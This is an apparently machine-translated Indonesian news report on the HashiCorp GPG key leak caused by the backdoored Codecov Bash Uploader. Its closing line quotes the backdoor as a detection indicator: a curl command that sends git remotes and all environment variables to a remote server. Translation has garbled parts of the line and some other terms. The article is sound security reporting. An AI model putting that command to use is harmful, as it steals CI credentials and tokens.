HashiCorp, yang dikenal sebagai pengembang alat open source Vagrant, Packer, Nomad, dan Terraform, mengumumkan kebocoran kunci GPG pribadi yang digunakan untuk membuat tanda tangan digital yang memverifikasi rilis. Penyerang yang memperoleh akses ke kunci GPG berpotensi membuat perubahan tersembunyi pada produk HashiCorp dengan memverifikasinya menggunakan tanda tangan digital yang benar. Pada saat yang sama, perusahaan menyatakan bahwa selama audit, tidak ada jejak upaya untuk melakukan modifikasi tersebut yang teridentifikasi.
Saat ini, kunci GPG yang disusupi telah dicabut dan kunci baru telah diperkenalkan sebagai gantinya. Masalah ini hanya memengaruhi verifikasi menggunakan file SHA256SUM dan SHA256SUM.sig, dan tidak memengaruhi pembuatan tanda tangan digital untuk paket DEB dan RPM Linux yang disediakan melalui rilis.hashicorp.com, serta mekanisme verifikasi rilis untuk macOS dan Windows (AuthentiCode) .
Kebocoran terjadi karena penggunaan skrip Codecov Bash Uploader (codecov-bash) di infrastruktur, yang dirancang untuk mengunduh laporan cakupan dari sistem integrasi berkelanjutan. Selama serangan terhadap perusahaan Codecov, pintu belakang disembunyikan ke dalam skrip yang ditentukan, yang melaluinya kata sandi dan kunci enkripsi dikirim ke server penyerang.
Untuk meretas, penyerang memanfaatkan kesalahan dalam proses pembuatan image Codecov Docker, yang memungkinkan mereka mengekstrak data akses ke GCS (Google Cloud Storage), yang diperlukan untuk membuat perubahan pada skrip Bash Uploader yang didistribusikan dari codecov.io situs web. Perubahan tersebut dilakukan pada tanggal 31 Januari, tetap tidak terdeteksi selama dua bulan dan memungkinkan penyerang mengekstrak informasi yang disimpan di lingkungan sistem integrasi berkelanjutan pelanggan. Dengan menggunakan kode berbahaya tambahan, penyerang dapat memperoleh informasi tentang repositori Git yang diuji dan semua variabel lingkungan, termasuk token, kunci enkripsi, dan kata sandi yang dikirimkan ke sistem integrasi berkelanjutan untuk mengatur akses ke kode aplikasi, repositori, dan layanan seperti Amazon Web Services dan GitHub.
Selain panggilan langsung, skrip Pengunggah Codecov Bash digunakan sebagai bagian dari pengunggah lain, seperti Codecov-action (Github), Codecov-circleci-orb, dan Codecov-bitrise-step, yang penggunanya juga terpengaruh oleh masalah tersebut. Semua pengguna codecov-bash dan produk terkait disarankan untuk mengaudit infrastruktur mereka, serta mengubah kata sandi dan kunci enkripsi. Anda dapat memeriksa keberadaan pintu belakang dalam skrip dengan adanya baris curl -sm 0.5 -d β$(git remote -v)<<<<<< ENV $(env)β http:// /unggah/v2 || BENAR
Sumber: opennet.ru